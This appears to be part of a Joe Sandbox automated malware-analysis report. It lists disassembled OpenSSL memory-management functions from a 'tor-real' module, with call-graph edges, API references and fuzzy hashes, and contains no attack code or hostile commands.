                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C1DC277
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: memset$L_cleanseO_reallocO_secure_clear_freeR_put_errormemcpy
                                                                            • String ID: A$Z$a$d
                                                                            • API String ID: 969627924-1291644000
                                                                            • Opcode ID: 5aa8363ac4f93c7fa8a984c6226f36246fbae18727104ef048087396cf46d403
                                                                            • Instruction ID: 90c7ac640fec2edf97ca92c05b6f558187c20e456ab9cff110b0f1136d5d6635
                                                                            • Opcode Fuzzy Hash: 5aa8363ac4f93c7fa8a984c6226f36246fbae18727104ef048087396cf46d403
                                                                            • Instruction Fuzzy Hash: 2F3146B56083059FC310AFA9C58474BBBE1AF95708F11CD2DE5D987B50E7B9A8488F82
                                                                            Function 6C29D3E0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 234COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CRYPTO_realloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6C270562), ref: 6C29D50A
                                                                            • memset.MSVCRT ref: 6C29D53A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_reallocmemset
                                                                            • String ID: m
                                                                            • API String ID: 881072843-3775001192
                                                                            • Opcode ID: 5df30f0fd312bc89ed0d36f029986f49ce903c540990b68147531354b739a2a1
                                                                            • Instruction ID: 8e02d17fd0748ffb86de67ad2f3611202f8243680f8f5afe0ddc98ba9e60b305
                                                                            • Opcode Fuzzy Hash: 5df30f0fd312bc89ed0d36f029986f49ce903c540990b68147531354b739a2a1
                                                                            • Instruction Fuzzy Hash: F6A125B56053068FDB04CF1AC48064ABBE1FF89318F158959EC589B719E370E909DF92
                                                                            Function 6C1DC0A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CRYPTO_secure_clear_free.LIBCRYPTO-1_1 ref: 6C1DC0D3
                                                                              • Part of subcall function 6C29F530: OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C29F551
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C1DC0EB
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C1DC10F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_cleanseO_clear_freeO_freeO_secure_clear_free
                                                                            • String ID: 3$5
                                                                            • API String ID: 545520606-2117576542
                                                                            • Opcode ID: 979ef04ae6faf62aa12e3bf32be8f288756334b4737efb30872a5c31800cf041
                                                                            • Instruction ID: eb2ce7ff151557fb4a86221608bd213ff45b3cfecb536301ce3a5db74c17009b
                                                                            • Opcode Fuzzy Hash: 979ef04ae6faf62aa12e3bf32be8f288756334b4737efb30872a5c31800cf041
                                                                            • Instruction Fuzzy Hash: D0F049B56083009BD700AF6AC1C531FBBE4AF81348F55CD2DE8980BA15D37AD088CF92
                                                                            Function 6C1A4FA0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 352COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 151 6c1a4fa0-6c1a4fb9 152 6c1a4fbf-6c1a4fc5 151->152 153 6c1a5095-6c1a509c 151->153 154 6c1a4fcb-6c1a4fd0 152->154 155 6c1a50a0-6c1a50a4 152->155 157 6c1a4fd6-6c1a4fdf 154->157 158 6c1a50e7-6c1a50ec 154->158 155->153 156 6c1a50a6-6c1a50ab 155->156 156->157 161 6c1a50b1-6c1a50b3 156->161 159 6c1a50c0-6c1a50c2 157->159 160 6c1a4fe5-6c1a4fe7 157->160 162 6c1a50cb-6c1a50e1 158->162 163 6c1a50ee-6c1a50fd 158->163 159->153 166 6c1a50c4 159->166 160->153 164 6c1a4fed 160->164 161->153 165 6c1a50b5 161->165 162->158 170 6c1a5102-6c1a5107 163->170 164->153 164->158 164->162 167 6c1a511a-6c1a5130 call 6c1a8940 164->167 168 6c1a51ed-6c1a5203 call 6c1a8940 164->168 169 6c1a526d-6c1a527b call 6c1a8900 164->169 164->170 171 6c1a4ff4-6c1a5014 164->171 165->153 165->158 165->159 165->162 165->167 165->169 165->170 172 6c1a545b-6c1a547b 165->172 173 6c1a53ec-6c1a53f3 165->173 174 6c1a5400-6c1a5405 165->174 175 6c1a52f7-6c1a5311 call 6c1a8940 165->175 166->153 166->158 166->162 166->167 166->169 166->170 166->172 166->173 166->174 166->175 167->153 192 6c1a5136-6c1a5158 call 6c1a8a70 167->192 168->153 198 6c1a5209-6c1a5229 168->198 193 6c1a506d-6c1a5073 169->193 194 6c1a5281-6c1a5284 169->194 170->153 183 6c1a5109-6c1a5117 170->183 171->153 196 6c1a5016-6c1a5024 call 6c1a8900 171->196 172->173 199 6c1a5481-6c1a5493 call 6c1a8900 172->199 179 6c1a543b-6c1a545a call 6c1a4a70 174->179 180 6c1a5407-6c1a541e call 6c1a4b80 174->180 175->173 200 6c1a5317-6c1a5337 175->200 183->167 212 6c1a515a-6c1a5164 192->212 213 6c1a51d4-6c1a51da 192->213 193->153 201 6c1a5075-6c1a508f CRYPTO_free 193->201 194->193 203 6c1a528a-6c1a52ab call 6c1a8c40 call 6c1a4b80 194->203 215 6c1a5050-6c1a5064 196->215 216 6c1a5026-6c1a5029 196->216 198->153 217 6c1a522f-6c1a5249 call 6c1a8a70 198->217 218 6c1a549e-6c1a54de CRYPTO_free 199->218 219 6c1a5495-6c1a5498 199->219 200->173 220 6c1a533d-6c1a535b call 6c1a8a70 200->220 201->153 203->193 223 6c1a5168-6c1a5183 call 6c1a8c50 212->223 213->153 222 6c1a51e0-6c1a51e8 213->222 215->193 216->215 225 6c1a502b-6c1a504c call 6c1a8c40 call 6c1a4b80 216->225 217->212 240 6c1a524f 217->240 219->218 227 6c1a55b0-6c1a55d5 call 6c1a8c40 call 6c1a4b80 219->227 235 6c1a535d-6c1a535f 220->235 236 6c1a53b3-6c1a53c7 220->236 243 6c1a5258-6c1a5262 223->243 244 6c1a5189-6c1a51ab call 6c1a8c40 call 6c1a4b80 223->244 225->215 227->218 241 6c1a5360-6c1a537d call 6c1a8c50 235->241 251 6c1a53d0-6c1a53e7 CRYPTO_free 236->251 246 6c1a51b7-6c1a51cb 240->246 256 6c1a5383-6c1a53ad call 6c1a8c40 call 6c1a4b80 241->256 257 6c1a5550-6c1a5556 241->257 243->223 252 6c1a5268 243->252 244->223 253 6c1a51ad-6c1a51b5 244->253 246->213 251->173 252->253 253->213 253->246 256->241 265 6c1a53af-6c1a53b1 256->265 257->241 259 6c1a555c 257->259 265->236 265->251
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: K
                                                                            • API String ID: 2581946324-856455061
                                                                            • Opcode ID: c3990cf5ee51775a99000876938af643f6b4f06c87c1e026e3ad82bd5aaae0cf
                                                                            • Instruction ID: b324d26de0e2a7ad8a4a5f0bcee2f4020e70beef24335f4c1f3c44a428c817be
                                                                            • Opcode Fuzzy Hash: c3990cf5ee51775a99000876938af643f6b4f06c87c1e026e3ad82bd5aaae0cf
                                                                            • Instruction Fuzzy Hash: 2EE146B89097059FD700DFAAC58025ABBF4FF95758F01882EE8898B710D735D84ACF82
                                                                            Function 6C09A5D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 266 6c09a5d0-6c09a610 267 6c09a620-6c09a623 call 6c0d6b60 266->267 268 6c09a612-6c09a61b 266->268 270 6c09a628-6c09a654 CRYPTO_malloc 267->270 271 6c09a670-6c09a6a2 call 6c0ca0c0 270->271 272 6c09a656-6c09a66b 270->272 271->268
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A64D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_malloc
                                                                            • String ID: ?$A$E
                                                                            • API String ID: 1457121658-1275417453
                                                                            • Opcode ID: 220bd60b95f2c8ef6a374eca19b29f0c3c97d74dc79b589fa6799d84c1eefea4
                                                                            • Instruction ID: a3962889de2982d9910de2d22ac0d59302c875a4fa97d519a6dcfe412d611a47
                                                                            • Opcode Fuzzy Hash: 220bd60b95f2c8ef6a374eca19b29f0c3c97d74dc79b589fa6799d84c1eefea4
                                                                            • Instruction Fuzzy Hash: 3B11B4B2604B019FD7009F39DC8075ABBE4FB80324F10072DE9B887790D736A858DB55
                                                                            Function 6C1B32D0 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 275 6c1b32d0-6c1b32dc 276 6c1b32de-6c1b32ed 275->276 277 6c1b32f6-6c1b32fa 275->277 278 6c1b32ef-6c1b32f4 276->278 279 6c1b3300-6c1b3308 276->279 278->277 278->279 280 6c1b330e-6c1b3310 279->280 281 6c1b33a0-6c1b33a2 279->281 282 6c1b3316-6c1b333e 280->282 283 6c1b33a4-6c1b33e1 280->283 281->283 284 6c1b3347-6c1b334b 281->284 287 6c1b3343-6c1b3345 282->287 283->287 285 6c1b3359-6c1b339c CRYPTO_free_ex_data CRYPTO_THREAD_lock_free CRYPTO_free 284->285 286 6c1b334d-6c1b3352 284->286 286->285 288 6c1b3354 286->288 287->277 287->284 288->285
                                                                            APIs
                                                                            • CRYPTO_free_ex_data.LIBCRYPTO-1_1 ref: 6C1B336B
                                                                            • CRYPTO_THREAD_lock_free.LIBCRYPTO-1_1 ref: 6C1B3376
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C1B338E
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_lock_freeO_freeO_free_ex_data
                                                                            • String ID:
                                                                            • API String ID: 1442806380-0
                                                                            • Opcode ID: 8b50c0241796c24854a54e58aee65129540e9a2a9338c91221e2e8315555d118
                                                                            • Instruction ID: 4fed8e562463587a2de277f514892c974f0773524f02b47b0f333fdc7c686f4d
                                                                            • Opcode Fuzzy Hash: 8b50c0241796c24854a54e58aee65129540e9a2a9338c91221e2e8315555d118
                                                                            • Instruction Fuzzy Hash: 1821F8B06093019BE7009F29C5D470BBBE0BF94708F55C91CE8949B791DB7AD499CF82
                                                                            Function 6C09A61C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 290 6c09a61c-6c09a654 call 6c0d6b60 CRYPTO_malloc 294 6c09a670-6c09a6a2 call 6c0ca0c0 290->294 295 6c09a656-6c09a66b 290->295
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A64D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_malloc
                                                                            • String ID: ?
                                                                            • API String ID: 1457121658-1684325040
                                                                            • Opcode ID: d1df4e82b27b9d68880a1aab94f17e12363c7c826599744734413e6a33c7086a
                                                                            • Instruction ID: 02eeea337fda764029f5f8aee6f1a083e035d83584944a8530daa04b4db02a63
                                                                            • Opcode Fuzzy Hash: d1df4e82b27b9d68880a1aab94f17e12363c7c826599744734413e6a33c7086a
                                                                            • Instruction Fuzzy Hash: C1E06D71701B019FD7009F35D880399F7E1FF84255F10463DC8A887610C732A4A5CB91
                                                                            Function 6C29F1D0 Relevance: 2.5, APIs: 2, Instructions: 44COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 299 6c29f1d0-6c29f1e3 300 6c29f208-6c29f20a 299->300 301 6c29f1e5-6c29f1e7 299->301 303 6c29f20c-6c29f213 300->303 304 6c29f250-6c29f259 300->304 301->300 302 6c29f1e9-6c29f200 301->302 308 6c29f21f-6c29f221 302->308 305 6c29f240-6c29f24a 303->305 306 6c29f215-6c29f21d malloc 303->306 305->306 306->308 309 6c29f223-6c29f232 memset 308->309 310 6c29f237-6c29f23e 308->310 309->310
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: mallocmemset
                                                                            • String ID:
                                                                            • API String ID: 2882185209-0
                                                                            • Opcode ID: 3a05bb34f1140a3d71389ed19725fab35512b7f3a21512134c705ef2e9f615ab
                                                                            • Instruction ID: d1ca814c3ef1f7bab5335f0a29ab4eb10f2704cb2a3a5a4bd6d1a29ad31a7d98
                                                                            • Opcode Fuzzy Hash: 3a05bb34f1140a3d71389ed19725fab35512b7f3a21512134c705ef2e9f615ab
                                                                            • Instruction Fuzzy Hash: AB01B175A0A3018FDB40DF69958074BBAE4BB44208F50452DFC8887700D370C8428B83
                                                                            Function 6C09AA50 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 419 6c09aa50-6c09aa62 420 6c09aaa1-6c09aab6 419->420 421 6c09aa64-6c09aa74 419->421 422 6c09aa78-6c09aa9f CRYPTO_free 421->422 422->420 422->422
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6C0B1647), ref: 6C09AA91
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: b4ae6d82587d3ce9b2b87a1a7ad50f1c8a4bde4b6966207afc57dc775bd4506a
                                                                            • Instruction ID: ec4eab1f5f375514258c066ca91372316a02e2b978a99940f4035e8f23bedad1
                                                                            • Opcode Fuzzy Hash: b4ae6d82587d3ce9b2b87a1a7ad50f1c8a4bde4b6966207afc57dc775bd4506a
                                                                            • Instruction Fuzzy Hash: D8F0BE716047069FEB10CF28E984B8BBBE0FF80348F50062CD8585B201C332F169CB91
                                                                            Function 6C09AAC0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 9bb851b2a5a7e6f23553cc6390e50597ead9852eeda5a4aa1822c500de86109f
                                                                            • Instruction ID: 1d2f6aee26c4a3d0205da40792e851c37e39fa2816899b3d83c8acc021b737d9
                                                                            • Opcode Fuzzy Hash: 9bb851b2a5a7e6f23553cc6390e50597ead9852eeda5a4aa1822c500de86109f
                                                                            • Instruction Fuzzy Hash: 59D05EB05043008BCB00AF54D9C574D7BE0BF95309F84486CEC885F353D33794948B52
                                                                            Function 6C1BA1D0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 80stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 6C2AC7D0: strlen.MSVCRT ref: 6C2AC7EF
                                                                              • Part of subcall function 6C2AC7D0: MultiByteToWideChar.KERNEL32 ref: 6C2AC824
                                                                              • Part of subcall function 6C2AC7D0: MultiByteToWideChar.KERNEL32 ref: 6C2AC86E
                                                                            • strchr.MSVCRT ref: 6C1BA1F8
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C1BA213
                                                                              • Part of subcall function 6C1B3130: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C1B3151
